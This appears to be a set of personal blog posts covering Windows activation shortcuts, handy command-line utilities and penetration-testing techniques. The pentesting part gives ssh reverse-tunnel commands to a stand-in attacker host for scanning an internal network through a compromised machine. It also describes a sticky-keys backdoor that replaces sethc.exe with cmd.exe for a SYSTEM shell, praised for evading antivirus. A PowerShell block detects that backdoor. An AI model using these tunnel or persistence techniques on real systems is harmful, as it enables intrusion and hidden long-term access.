Very worthwhile to checkout!
http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
#Update 10/7/2015 It appears that IE9 and IE10 will not work on these activation URLs but google-chrome and the like seem to work.
Are you ever tired of having to call Microsoft’s automated system to activate your Windows install? Use this URL instead, it’s ten times faster after you have your installation ID window up (accessible via slui.exe 4 in the run prompt):
#Update 7/30/2015
Should you have problems with that URL, try this one:
#Update 3/31/2016
New URL to use: http://bit.ly/1q60R3W
#Update 6/8/2018
New URL to use: http://m.vivr.io/mUJ1zm3
#Update 6/21/2018
Doesn’t seem to work anymore and you need to call their automated phone system and get a unique URL each time.
Ah… WINKEY+R and cmd.exe, two awesome means of launching programs and commands within a Windows environment. In my humble opinion, WINKEY+R is probably one of the best keyboard shortcuts to know, especially if you work in the tech industry. I mention this because I find myself using this keyboard shortcut a lot and it’s nice just to call out the name of a program rather than hunting around for it in a GUI. Need to see a traceroute for google.com? WINKEY+R then tracert www.google.com. Need to do a forced shutdown? WINKEY+R then shutdown -s -t 0 -f. The list goes on, but today we will be adding to this list, because we all know that there are a myriad of utilities out there that don’t come with Windows installations by default, and it’s nice to have them sitting in your System32 directory or in your %PATH% variable to quickly execute. I will warn you that some of the utilities I will recommend may make it easier for your system to be used as a pivot point if your system gets compromised. Additionally, some of these tools may be detected as ‘viruses’ by anti-virus programs. Lastly, this article isn’t a comprehensive list of ALL the utilities that could be added or desired. It’s merely a means of getting you started. With that being said, let’s continue.
Cygwin:
For those of you who want to give your Windows system more of a UNIX/Linux feel, I strongly recommend installing Cygwin and customizing your install to have all the Unix-based goodies that your little heart desires. Once you’ve done this, add Cygwin’s /bin/ directory to your %PATH% variable. Now you can use egrep instead of findstr. You can also now use wget, curl, the ssh utilities suite, netcat, perl and other powerful scripting languages from cmd.exe! (Provided you have selected to install these during the customization part of your Cygwin install.)
Sysinternals Tools:
Mark Russinovich deserves a medal of some sort. Practically every tool he makes for Windows is a must-have if you work on Windows systems. So feel free to download and copy all of these .exe files to your System32 directory:
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
I personally use autoruns.exe all the time as a much better alternative to msconfig and hijackthis.
Putty software suite:
If you forgot to install the ssh utilities under Cygwin, don’t worry; put these in your System32 directory instead:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Other useful tools to have:
Here’s a list of some other tools that are very useful to have in your System32 directory:
Bluescreenview – great utility for getting information on BSODs
coretemp – pretty self-explanatory
cpuz – very useful tool for getting information about your CPU, motherboard, and RAM
fciv – Microsoft’s hash checksum utility
gpuz – like cpuz but for graphics cards
p95 – useful tool to benchmark your system
rufus – create bootable USB drives with picky distros (not all work with YUMI)
Speccy – great alternative to msinfo32 that is better in some departments
usbdeview – useful for getting information about USB devices that have been plugged into your system
YUMI – create multi-Linux-distro and OS bootable flash drives (see: http://zitstif.no-ip.org/?p=973)
Of course this list isn’t complete, but I strongly feel that this is a good start. If you feel inclined to suggest some tools/utilities to add to the list, feel free to leave a comment or send me an email.
Using a ‘trusted’ host that you have compromised as leverage during a pentest is nearly always advantageous. I personally believe that the steps of pentesting change, in a sense, once you have a session on a computer in an internal network from an external computer.
I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what better way to give the ‘man on the inside’ some ‘eyes’ than by deploying and using nmap!
One means of using nmap through the compromised host includes:
1.) Deploying an openssh server on the victim machine
2.) Setting up an account
3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com
4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222
5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through the tunnel between you and the victim machine.
Keep in mind that the Metasploit framework has an auxiliary module, “auxiliary/scanner/portscan”, which you can use, but let me be quite frank: it doesn’t compare to what is known as the ‘king of all port scanners’, nmap. (No offense, Metasploit crew.)
This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine (i.e. nmap --script=smb-check-vulns).
The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.
NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap. Luckily there is a module in the Metasploit framework that will help you (post/windows/escalate/bypassuac).
http://zitstif.no-ip.org/meterpreter/stickykeys.txt
Through the past year or so, I’ve had some ideas for meterpreter scripts floating around in my head that I’ve been meaning to put to use. So this is my first unofficial meterpreter script for the Metasploit Framework.
The purpose of this script is to place a backdoor onto a Windows victim system. What it does is simply copy cmd.exe over sethc.exe. The sethc.exe program is the Sticky Keys program. To activate this program you just have to hit the shift key 5 times, and sethc.exe will be executed.
While this can be useful for those who are disabled, there is also an abuse for this feature. If you have copied cmd.exe over to sethc.exe, you can then hit shift 5 times and be provided a shell.
If you’re at a logon prompt and this backdoor is in place, when you activate sethc.exe (instead of logging in) you get a shell with SYSTEM-level privileges!
This may seem trivial; however, if you’re doing a penetration test on a remote Windows system that is running Remote Desktop, this can be a deadly means of maintaining access. You can then use this to pivot your way back into the system, even if the original means (say, for instance, http) is blocked by an IPS and/or firewall.
One truly beautiful facet of this method, if you’re an attacker, is that cmd.exe renamed as sethc.exe did not trigger any responses from scanners on www.virustotal.com.
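Because the backdoor is a byte-for-byte copy of cmd.exe, a defender can spot it without any signatures: the file hashes of sethc.exe and cmd.exe become identical, and the version resource inside sethc.exe still names cmd.exe. The following PowerShell check is an added example written for this post, not part of the author’s script; it assumes PowerShell 4.0 or later (for Get-FileHash) and that the -SystemRoot parameter is a convenience I introduced for checking a mounted offline image.

```powershell
# Added example: detect the sethc.exe-replaced-by-cmd.exe backdoor described above.
# Assumes PowerShell 4.0+ (Get-FileHash). -SystemRoot is a hypothetical parameter
# so the same check can be pointed at an offline image mounted elsewhere.
function Test-StickyKeysBackdoor {
    param(
        [string]$SystemRoot = $env:SystemRoot
    )
    $system32 = Join-Path $SystemRoot 'System32'
    $sethc    = Join-Path $system32 'sethc.exe'
    $cmd      = Join-Path $system32 'cmd.exe'

    if (-not (Test-Path $sethc)) {
        return [pscustomobject]@{ Path = $sethc; Suspicious = $true; Reason = 'sethc.exe missing' }
    }

    $reasons = @()

    # 1. A straight copy of cmd.exe has exactly the same SHA-256 hash as cmd.exe.
    $sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
    $cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
    if ($sethcHash -eq $cmdHash) { $reasons += 'hash identical to cmd.exe' }

    # 2. Renaming does not change the embedded version resource, which still
    #    reports cmd.exe as the original file name.
    $origName = (Get-Item $sethc).VersionInfo.OriginalFilename
    if ($origName -and $origName -notlike 'sethc*') {
        $reasons += "OriginalFilename is '$origName'"
    }

    # 3. Other tampering usually shows up as a broken or missing Microsoft signature.
    #    On older Windows, System32 binaries are catalog-signed, so treat a bare
    #    'NotSigned' as weak evidence unless it appears together with the checks above.
    $sig = Get-AuthenticodeSignature -FilePath $sethc
    if ($sig.Status -ne 'Valid') { $reasons += "signature status $($sig.Status)" }

    [pscustomobject]@{
        Path       = $sethc
        SHA256     = $sethcHash
        Suspicious = ($reasons.Count -gt 0)
        Reason     = ($reasons -join '; ')
    }
}

Test-StickyKeysBackdoor | Format-List
```

A clean system reports Suspicious = False with an empty Reason; the same check can be run in a scheduled task or pushed through Group Policy to cover every host that exposes Remote Desktop.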
I’m planning on adding more to this script, but I just wanted to get this released for the time being. I also want to state that I just put this idea to use for the Metasploit project; this hack has been around for a while:
To install this, simply download the txt file, then change the extension to .rb and throw this file in the framework3/msf3/scripts/meterpreter/ directory.
#Update 7/20/2011
Issue Addressed: Switched all C:\\WINDOWS to %SYSTEMROOT% (Thanks Rod Macpherson)
BUG: On Nokia N900 with Ruby 1.8.7 (arm-linux-eabi), with Metasploit Framework version svn r13268, I am receiving a compile error message at line 70 (Unexpected ‘)’).
NOTE: I am not having this issue on Backtrack 5 32bit with Ruby 1.9.2dev (i686-linux)